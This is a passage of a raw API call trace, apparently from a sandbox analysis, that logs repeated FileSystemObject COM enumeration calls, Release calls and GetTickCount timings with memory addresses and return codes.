	[0046.564] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.564] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.565] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.565] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.565] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.565] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.568] GetTickCount () returned 0x1144e8e
	[0046.568] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42e748, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.568] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.568] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.574] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.575] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ebd0) returned 0x0
	[0046.575] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x1
	[0046.575] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.575] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x0
	[0046.576] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.576] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ebd0) returned 0x0
	[0046.576] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x1
	[0046.576] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.577] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec68, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.577] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x0
	[0046.577] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.580] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.580] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.581] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.581] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.581] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.582] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.582] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.582] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.582] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.584] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42e748, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.584] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.585] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.585] GetTickCount () returned 0x1144e9d
	[0046.588] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.588] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ebd0) returned 0x0
	[0046.588] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x1
	[0046.588] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.588] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x0
	[0046.589] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.589] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ebd0) returned 0x0
	[0046.589] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x1
	[0046.589] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.590] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec68, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.591] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ece8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.591] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x0
	[0046.591] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.595] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.595] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.595] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.595] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.595] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.596] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.596] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.596] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.596] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.597] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42e748, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.598] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.599] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.600] GetTickCount () returned 0x1144ead
	[0046.602] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.602] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ebd0) returned 0x0
	[0046.602] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x1
	[0046.602] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.602] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x0
	[0046.603] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.603] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ebd0) returned 0x0
	[0046.603] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x1
	[0046.603] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.604] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec68, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.604] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x0
	[0046.605] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.608] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.608] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.608] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.609] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.609] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.609] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.610] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.610] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.611] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42e748, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.612] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ecf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.615] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42e748, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.616] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ecf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.617] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42e748, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.617] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.617] GetTickCount () returned 0x1144ebd
	[0046.617] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.621] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.621] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ebd0) returned 0x0
	[0046.621] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x1
	[0046.621] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.621] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x0
	[0046.622] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.622] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ebd0) returned 0x0
	[0046.622] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x1
	[0046.622] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.623] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec68, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.623] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x0
	[0046.623] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.626] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.627] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.627] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.627] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.627] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.628] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.628] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.629] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42e748, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.629] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.630] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.632] GetTickCount () returned 0x1144ecc
	[0046.634] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.634] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ebd0) returned 0x0
	[0046.634] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x1
	[0046.634] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.635] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x0
